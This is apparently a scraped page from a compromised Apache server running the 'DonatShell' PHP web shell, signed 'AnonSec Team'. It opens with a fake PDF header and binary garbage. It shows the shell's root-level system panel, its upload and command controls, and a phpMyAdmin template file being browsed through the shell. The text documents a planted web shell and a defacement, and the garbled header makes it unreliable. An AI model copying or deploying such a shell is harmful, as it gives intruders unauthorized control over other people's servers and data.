%PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : 49.231.201.246  /  Your IP : 216.73.216.149
Web Server : Apache/2.4.18 (Ubuntu)
System : Linux 246 4.4.0-210-generic #242-Ubuntu SMP Fri Apr 16 09:57:56 UTC 2021 x86_64
User : root ( 0)
PHP Version : 7.0.33-0ubuntu0.16.04.16
Disable Function : exec,passthru,shell_exec,system,proc_open,popen,pcntl_exec
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /usr/share/phpmyadmin/templates/table/search/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /usr/share/phpmyadmin/templates/table/search/selection_form.phtml
<?php echo PMA\Template::get('table/search/form_tag')
    ->render(array(
        'searchType' => $searchType,
        'db' => $db,
        'table' => $table,
        'goto' => $goto
    )) ?>
<?php if ($searchType == 'zoom'): ?>
    <fieldset id="fieldset_zoom_search">
        <fieldset id="inputSection">
            <legend>
                <?php echo __('Do a "query by example" (wildcard: "%") for two different columns'); ?>
            </legend>
            <?php echo PMA\Template::get('table/search/fields_table')
                ->render(array(
                    'self' => $self,
                    'searchType' => $searchType,
                    'geomColumnFlag' => $geomColumnFlag,
                    'columnNames' => $columnNames,
                    'columnTypes' => $columnTypes,
                    'columnCollations' => $columnCollations
                ));
            echo PMA\Template::get('table/search/options_zoom')
                ->render(array(
                    'dataLabel' => $dataLabel,
                    'columnNames' => $columnNames
                )); ?>
        </fieldset>
    </fieldset>
<?php elseif ($searchType == 'normal'): ?>
    <fieldset id="fieldset_table_search">
        <fieldset id="fieldset_table_qbe">
            <legend>
                <?php echo __('Do a "query by example" (wildcard: "%")'); ?>
            </legend>
            <?php echo PMA\Template::get('table/search/fields_table')
                ->render(array(
                    'self' => $self,
                    'searchType' => $searchType,
                    'geomColumnFlag' => $geomColumnFlag,
                    'columnNames' => $columnNames,
                    'columnTypes' => $columnTypes,
                    'columnCollations' => $columnCollations
                )); ?>
            <div id="gis_editor">
            </div>
            <div id="popup_background">
            </div>
        </fieldset>
        <?php echo PMA\Template::get('table/search/options')
            ->render(array(
                'columnNames' => $columnNames
            )); ?>
    </fieldset>
<?php elseif ($searchType == 'replace'): ?>
    <fieldset id="fieldset_find_replace">
        <fieldset id="fieldset_find">
            <legend>
                <?php echo __('Find and replace'); ?>
            </legend>
            <?php echo PMA\Template::get('table/search/search_and_replace')
                ->render(array(
                    'columnNames' => $columnNames,
                    'columnTypes' => $columnTypes
                )); ?>
        </fieldset>
    </fieldset>
<?php endif; ?>

<!--Displays selection form's footer elements-->
<fieldset class="tblFooters">
    <input type="submit"
           name="<?php echo ($searchType == 'zoom' ? 'zoom_submit' : 'submit'); ?>"
           <?php if ($searchType == 'zoom') echo ' id="inputFormSubmitId"'; ?>
           value="<?php echo __('Go'); ?>" />
</fieldset>
</form>
<div id="sqlqueryresultsouter"></div>

Anon7 - 2022
AnonSec Team